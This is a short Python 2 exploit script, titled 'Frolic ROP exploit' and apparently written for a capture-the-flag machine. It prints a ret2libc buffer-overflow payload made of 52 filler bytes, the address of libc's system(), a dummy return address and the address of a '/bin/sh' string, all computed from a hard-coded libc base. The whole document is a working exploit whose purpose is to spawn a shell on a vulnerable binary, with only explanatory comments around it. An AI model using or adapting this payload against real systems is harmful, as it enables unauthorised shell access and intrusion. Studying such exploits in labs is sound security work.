Frolic ROP exploit
#!/usr/bin/python
from struct import pack
def little(x):
    """Pack *x* as a 4-byte little-endian unsigned word (``struct`` format ``'<I'``).

    Returns exactly what ``pack('<I', x)`` returns; a value outside the
    0..0xFFFFFFFF range raises ``struct.error`` from ``pack``.
    """
    fmt = "<I"  # little-endian, unsigned 32-bit
    return pack(fmt, x)
# Target-specific layout constants. libc_addr is an absolute address, so the
# layout only lines up on a target whose libc is mapped at that fixed base;
# whether that holds (e.g. ASLR state) cannot be confirmed from this file.
buf_len = 52                     # number of filler bytes emitted before the first word
libc_addr = 0xB7E19000           # libc base address the offsets below are added to
system_off = 0x0003ADA0          # per its name, an offset inside libc (system) -- unverified here
trash_ret = little(0xDEADBEEF)   # filler word placed between the two computed addresses
binsh_str_off = 0x15BA0B         # per its name, an offset inside libc (a "/bin/sh" string) -- unverified here
def main():
    """Assemble the payload and write it to stdout.

    The output is ``buf_len`` copies of ``"A"`` followed by three 4-byte
    little-endian words: ``libc_addr + system_off``, ``trash_ret`` and
    ``libc_addr + binsh_str_off``. Nothing here validates the module-level
    constants; they must match the target for the bytes to mean anything.
    """
    pieces = [
        "A" * buf_len,
        little(libc_addr + system_off),
        trash_ret,
        little(libc_addr + binsh_str_off),
    ]
    buf = "".join(pieces)
    # Python 2 print statement: writes the payload plus a trailing newline.
    print buf
# Only run when executed directly, not when imported as a module.
if "__main__" == __name__:
    main()